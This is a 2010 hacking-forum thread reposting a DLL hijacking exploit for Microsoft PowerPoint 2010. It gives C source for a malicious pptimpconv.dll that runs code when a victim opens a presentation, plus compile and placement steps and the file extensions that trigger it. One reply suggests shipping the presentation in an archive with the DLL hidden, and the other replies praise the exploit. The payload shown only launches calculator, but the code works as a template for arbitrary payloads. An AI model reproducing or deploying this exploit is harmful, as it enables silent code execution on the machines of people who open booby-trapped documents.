Microsoft PowerPoint 2010 DLL Hijacking Exploit (pptimpconv.dll)

begood · August 24, 2010

/*
Exploit Title: Microsoft PowerPoint 2010 DLL Hijacking Exploit (pptimpconv.dll)
Date: 24/08/2010
Author: TheLeader
Email: gsog2009 [a7] hotmail [d0t] com
Software Link: http://office.microsoft.com/en-us/powerpoint/
Version: 14.0.4760.1000
Tested on: Windows 7 x86 (6.1.7600)

Compile and rename to pptimpconv.dll, create a file in the same dir with one of the following extensions:
.odp / .pot / .potm / .potx / .ppa / .pps / .ppsm / .ppsx / .ppt / .pptm / .pptx / .pwz / .sldm / .sldx

This exploit does _not_ get triggered with the following file extensions:
.pothtml / .ppam / .ppthtml / .pptxml / .thmx

Double click & watch a nice calculator pop =]
*More shouts* to all the great guys at forums.hacking.org.il
*/

#include <windows.h>
#define DLLIMPORT __declspec (dllexport)

DLLIMPORT void HrCreateConverter() { evil(); }

int evil()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}

Nytro · August 24, 2010

Dragut. Pacat ca nu pot testa de pe Linux.

Se poate face o arhiva cu fisierul ppt/s si acest dll sa fie hidden, desi nici nu ar fi necesar.

qbert · August 24, 2010

Microsoft DLL Hijacking Exploit in action <= video

Flubber · August 24, 2010

I just had a jizz! o.O

Zirou dei, multam fain!

AlStar · August 24, 2010

This is awesome

gabyyy · September 12, 2010

pt powerpoint 2007 a reusit careva sa faca exploitul sa mearga? asta de aici Microsoft Office PowerPoint 2007 DLL Hijacking Exploit (rpawinet.dll)

Sign In

Microsoft PowerPoint 2010 DLL Hijacking Exploit (pptimpconv.dll)

Recommended Posts

begood

Nytro

qbert

Flubber

AlStar

gabyyy

Join the conversation

Browse

Activity

Pages